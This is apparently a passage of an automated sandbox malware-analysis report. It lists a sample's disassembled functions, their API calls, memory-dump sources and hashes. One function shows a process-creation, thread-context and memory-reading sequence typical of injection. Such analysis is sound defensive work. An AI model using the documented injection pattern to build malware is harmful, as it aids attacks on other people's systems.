                                            • Opcode ID: 55717ee110a2f79faab11c635d1f69bc367e5e0101ae12752b432f42ef88fd4f
                                            • Instruction ID: b3bc0dfa2de298657af5e5c3d19001c9cf6b375c106c032d5cd9fc5a7baa3450
                                            • Opcode Fuzzy Hash: 55717ee110a2f79faab11c635d1f69bc367e5e0101ae12752b432f42ef88fd4f
                                            • Instruction Fuzzy Hash: 74019671684708FEF3640E14DC86FA6379CAB0176CF108315FAE57A1D0C6B01D858B54
                                            Function 00E30FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E3594C: __FF_MSGBANNER.LIBCMT ref: 00E35963
                                              • Part of subcall function 00E3594C: __NMSG_WRITE.LIBCMT ref: 00E3596A
                                              • Part of subcall function 00E3594C: RtlAllocateHeap.NTDLL(01030000,00000000,00000001,00000000,?,?,?,00E31013,?), ref: 00E3598F
                                            • std::exception::exception.LIBCMT ref: 00E3102C
                                            • __CxxThrowException@8.LIBCMT ref: 00E31041
                                              • Part of subcall function 00E387DB: RaiseException.KERNEL32(?,?,?,00ECBAF8,00000000,?,?,?,?,00E31046,?,00ECBAF8,?,00000001), ref: 00E38830
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                            • String ID:
                                            • API String ID: 3902256705-0
                                            • Opcode ID: 0af7eee0333cd242ffc0a4fabd885480d05d021931dc6033a1a7da0774880180
                                            • Instruction ID: b45a9177a0c082bf12c81479c09df9e14a0812d9f3bd3b7674e0b8a3ea528101
                                            • Opcode Fuzzy Hash: 0af7eee0333cd242ffc0a4fabd885480d05d021931dc6033a1a7da0774880180
                                            • Instruction Fuzzy Hash: CDF0283550030DA6CB24BA98ED1EADF7FEC9F01354F10206EF904B6982DFB19A80D6D0
                                            Function 00E3582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: __lock_file_memset
                                            • String ID:
                                            • API String ID: 26237723-0
                                            • Opcode ID: 32dfb454078785b10238ab2a5b938c11824cc34e140b299b2a624320dce20dca
                                            • Instruction ID: 62011afde536c4029db98fae884b2807da115b9fae14b1e085f568f6156e4c38
                                            • Opcode Fuzzy Hash: 32dfb454078785b10238ab2a5b938c11824cc34e140b299b2a624320dce20dca
                                            • Instruction Fuzzy Hash: 9E016C72C00709EBCF16AF658D0E99F7FA1AF40360F155229F8147B261DB358A11DF91
                                            Function 00E355D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E38D68: __getptd_noexit.LIBCMT ref: 00E38D68
                                            • __lock_file.LIBCMT ref: 00E3561B
                                              • Part of subcall function 00E36E4E: __lock.LIBCMT ref: 00E36E71
                                            • __fclose_nolock.LIBCMT ref: 00E35626
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                            • String ID:
                                            • API String ID: 2800547568-0
                                            • Opcode ID: df405f7693be4ea6cf385f8484b28a4083b83d025f3a4c5559e433a10c84e272
                                            • Instruction ID: 712d47d955b42d6566c41af698df9547f71bbbf167ee82c4238f3ba57cd045f1
                                            • Opcode Fuzzy Hash: df405f7693be4ea6cf385f8484b28a4083b83d025f3a4c5559e433a10c84e272
                                            • Instruction Fuzzy Hash: F0F09072904B05DAD721AB75890BB6EAFE16F40334F55A249B814BB2C1CF7C8A01DB95
                                            Function 00D4129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 00D41A5B
                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00D41AF1
                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00D41B13
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302068415.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d40000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                            • String ID:
                                            • API String ID: 2438371351-0
                                            • Opcode ID: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                                            • Instruction ID: cea8394b1aec5cfdd7497b92135dd4e948d60c63b07020e49f010d90f8cef1a0
                                            • Opcode Fuzzy Hash: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                                            • Instruction Fuzzy Hash: A212BD24E24658C6EB24DF64D8507DEB232EF68300F1090E9D10DEB7A5E77A4F85CB5A
                                            Function 00E22123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 802769ecda857d24d9b0af878398e31e2db415f7170a58d58bbe3d1e6e19ae2b
                                            • Instruction ID: 8b476127a643785eae4ea7dc8ff067a7f1101d870c7d0578f62ca9485851326f
                                            • Opcode Fuzzy Hash: 802769ecda857d24d9b0af878398e31e2db415f7170a58d58bbe3d1e6e19ae2b
                                            • Instruction Fuzzy Hash: 1151AC31700214EFCF14EB68D991EAE77E6AF84314F14A4A8F956BB392CA30ED44CB41
                                            Function 00E1766F Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _memmove
                                            • String ID:
                                            • API String ID: 4104443479-0
                                            • Opcode ID: 2548961d131164ccd24838d8a9b11557f428afeebf0c8d981de7b88311caff12
                                            • Instruction ID: dead1eeac5a7ead3e02e14b0406759a72669f992264fcf4355f5a1f1b4d3e580
                                            • Opcode Fuzzy Hash: 2548961d131164ccd24838d8a9b11557f428afeebf0c8d981de7b88311caff12
                                            • Instruction Fuzzy Hash: 9531A379208A02DFD7249F18C0909A5F7F0FF09B10B54D56AE9DA9B7A5E730D8C1CB84
                                            Function 00E15C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00E15CF6
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: FilePointer
                                            • String ID:
                                            • API String ID: 973152223-0
                                            • Opcode ID: 455251f744fcb4dacda7772898cb6cad7d8d08a785a7d0f28330e291c66df059
                                            • Instruction ID: 9d8942a9ac45d648d61c7b9c165e684093aa41da2bc01ef9ae1ffec275ee74b6
                                            • Opcode Fuzzy Hash: 455251f744fcb4dacda7772898cb6cad7d8d08a785a7d0f28330e291c66df059
                                            • Instruction Fuzzy Hash: C6313C72A00B09EFCB18DF29D48469DF7B5FF88314F149629D819A3710D771A9A0DBD0
                                            Function 00E500D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ClearVariant
                                            • String ID:
                                            • API String ID: 1473721057-0
                                            • Opcode ID: 1a3bb094cb63ae679615089ac414e7c46c54b0665adaa92af685e88f39386ec4
                                            • Instruction ID: fe7b1283822a9872e4593607aea3a49b842ebd97b414ebab919083aa23426ea3
                                            • Opcode Fuzzy Hash: 1a3bb094cb63ae679615089ac414e7c46c54b0665adaa92af685e88f39386ec4
                                            • Instruction Fuzzy Hash: C6410674509351CFDB24DF14C484B5ABBE0BF45318F1998ACE899AB362C332E889CB52
                                            Function 00E15B19 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _memmove
                                            • String ID:
                                            • API String ID: 4104443479-0
                                            • Opcode ID: 67f77c0f1113e19b13200b09ed2300e907a1473a27ef487db93cdd1597ace486
                                            • Instruction ID: edc6b668ea6272eac8c3763f44231b07c7e15ec63a598c393f1ef8b8543e6a1d
                                            • Opcode Fuzzy Hash: 67f77c0f1113e19b13200b09ed2300e907a1473a27ef487db93cdd1597ace486
                                            • Instruction Fuzzy Hash: 9321D231A04A08EBDB185F52F885ABA7FF8FF50340F21946EE495F5610EB7294E0DB45
                                            Function 00E14F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E14D13: FreeLibrary.KERNEL32(00000000,?), ref: 00E14D4D
                                              • Part of subcall function 00E3548B: __wfsopen.LIBCMT ref: 00E35496
                                            • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00ED62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E14F6F
                                              • Part of subcall function 00E14CC8: FreeLibrary.KERNEL32(00000000), ref: 00E14D02
                                              • Part of subcall function 00E14DD0: _memmove.LIBCMT ref: 00E14E1A
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Library$Free$Load__wfsopen_memmove
                                            • String ID:
                                            • API String ID: 1396898556-0
                                            • Opcode ID: 0030ece74b6fb73ff4c7d91db2196bad8fd1b0b15119c4879c3e5b154466ca59
                                            • Instruction ID: e60fa18a13e4824fb08142924d374bfb419707379f6de4b977773bf9ab55a243
                                            • Opcode Fuzzy Hash: 0030ece74b6fb73ff4c7d91db2196bad8fd1b0b15119c4879c3e5b154466ca59
                                            • Instruction Fuzzy Hash: DC11E372B00709AACF14BF70DC02FEE77E89F44710F24A82AF541B63C1DA719A459BA0
                                            Function 00E501AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ClearVariant
                                            • String ID:
                                            • API String ID: 1473721057-0
                                            • Opcode ID: b1090f1c0eb598367593cbfb988768624a85f99bdad59388e551dcc2a9a3f05c
                                            • Instruction ID: 6cbbcbf680c0bec66e1333a2e8e8246596d56ffab835f563f12ee4b9b0cf48fb
                                            • Opcode Fuzzy Hash: b1090f1c0eb598367593cbfb988768624a85f99bdad59388e551dcc2a9a3f05c
                                            • Instruction Fuzzy Hash: 282124B4508341DFCB14DF54C444AAABBE0BF84318F09996CF88AA7722D731E889CB52
                                            Function 00E15D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00E15807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00E15D76
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 1ae5e6cb58e832509b6e3f6cb48fcf8c7039275364e40d9abb6424f1e2e43afb
                                            • Instruction ID: 7512cd53902276786ece1276800e1bb6c4beb45f7c6055396c9b1c5e01587142
                                            • Opcode Fuzzy Hash: 1ae5e6cb58e832509b6e3f6cb48fcf8c7039275364e40d9abb6424f1e2e43afb
                                            • Instruction Fuzzy Hash: F8113A72200B01DFD3308F15E884BA3B7F5EF85754F10D92EE4AA96A50D770E985CB60
                                            Function 00E15BDA Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _memmove
                                            • String ID:
                                            • API String ID: 4104443479-0
                                            • Opcode ID: 327c95574f60e5010daba2857bec39af6c2e223ed2d997c94b99b88fa264bf6e
                                            • Instruction ID: 0e23f86f7b56d052801519f61080c32792f92ec65fd2eaa582ec486b466d2a9b
                                            • Opcode Fuzzy Hash: 327c95574f60e5010daba2857bec39af6c2e223ed2d997c94b99b88fa264bf6e
                                            • Instruction Fuzzy Hash: CD018FB9604542AFC305DB29D851D66FBE9FF8A3507149159F819D7702DB70EC21CBE0
                                            Function 00E17F41 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _memmove
                                            • String ID:
                                            • API String ID: 4104443479-0
                                            • Opcode ID: 81493697be757b975a0c6ed5652a7c4d93deff9418cd33d5771e7bc70a58f4b3
                                            • Instruction ID: eca09d23127980cdc19ded3791cc7e8a10b2d0a7d57db654bc7822fb6d814f92
                                            • Opcode Fuzzy Hash: 81493697be757b975a0c6ed5652a7c4d93deff9418cd33d5771e7bc70a58f4b3
                                            • Instruction Fuzzy Hash: 3901D6723047056ED3245B29CC06FA7BBE4AB48B60F14952EF69ADA191EA71E441CB50
                                            Function 00E34A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                            Download Yara Rule
                                            APIs
                                            • __lock_file.LIBCMT ref: 00E34AD6
                                              • Part of subcall function 00E38D68: __getptd_noexit.LIBCMT ref: 00E38D68
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: __getptd_noexit__lock_file
                                            • String ID:
                                            • API String ID: 2597487223-0
                                            • Opcode ID: 441445c9118bfb8adbc072550333b9393285074abc4438fd3170ac8e0be92d2e
                                            • Instruction ID: a8962567961d6943d818a6e43db9ad1ed30d89585fcffa9767f1aa6d7348d4ad
                                            • Opcode Fuzzy Hash: 441445c9118bfb8adbc072550333b9393285074abc4438fd3170ac8e0be92d2e
                                            • Instruction Fuzzy Hash: 5BF0FFB1900309ABDF61AF748C0E7AE7FE0AF00329F04A104B424BA0D1DB788E10CF40
                                            Function 00E14FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                            Download Yara Rule
                                            APIs
                                            • FreeLibrary.KERNEL32(?,?,00ED62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E14FDE
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: FreeLibrary
                                            • String ID:
                                            • API String ID: 3664257935-0
                                            • Opcode ID: a897138ee8e8b535d4a36e7aaffacba90374deb969a4f54af1776cbcb1c03212
                                            • Instruction ID: 3413d785c70eec9f4c975d0b157426a3682643821700e560ee57e68c22130956
                                            • Opcode Fuzzy Hash: a897138ee8e8b535d4a36e7aaffacba90374deb969a4f54af1776cbcb1c03212
                                            • Instruction Fuzzy Hash: C5F039B1205712CFCB34AF65E494C92BBE1BF08329320AA3EE1D6A2750C731A895DF40
                                            Function 00E309D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E309F4
                                              • Part of subcall function 00E17D2C: _memmove.LIBCMT ref: 00E17D66
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: LongNamePath_memmove
                                            • String ID:
                                            • API String ID: 2514874351-0
                                            • Opcode ID: 10e1724271d15f63d1847b92047d37f107abac8c98d31ec188f3ec3448189735
                                            • Instruction ID: 28187c95437e3ff9b041c8c433c52540bf16d82180da5b73ac319ce590a91991
                                            • Opcode Fuzzy Hash: 10e1724271d15f63d1847b92047d37f107abac8c98d31ec188f3ec3448189735
                                            • Instruction Fuzzy Hash: 9DE0CD7690422C5BC720D698AC05FFA77EDDF89790F0501F6FC4CE7214D9609CC18690
                                            Function 00E79129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: __fread_nolock
                                            • String ID:
                                            • API String ID: 2638373210-0
                                            • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                            • Instruction ID: 00a4b389b4589d4a459d81458a347181649bec5922821790243ff22998c8a314
                                            • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                            • Instruction Fuzzy Hash: C8E09AB1204B409FDB388A24D815BE377E0AF06319F00081CF2AAA3342EB62B841CB59
                                            Function 00E15DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                            Download Yara Rule
                                            APIs
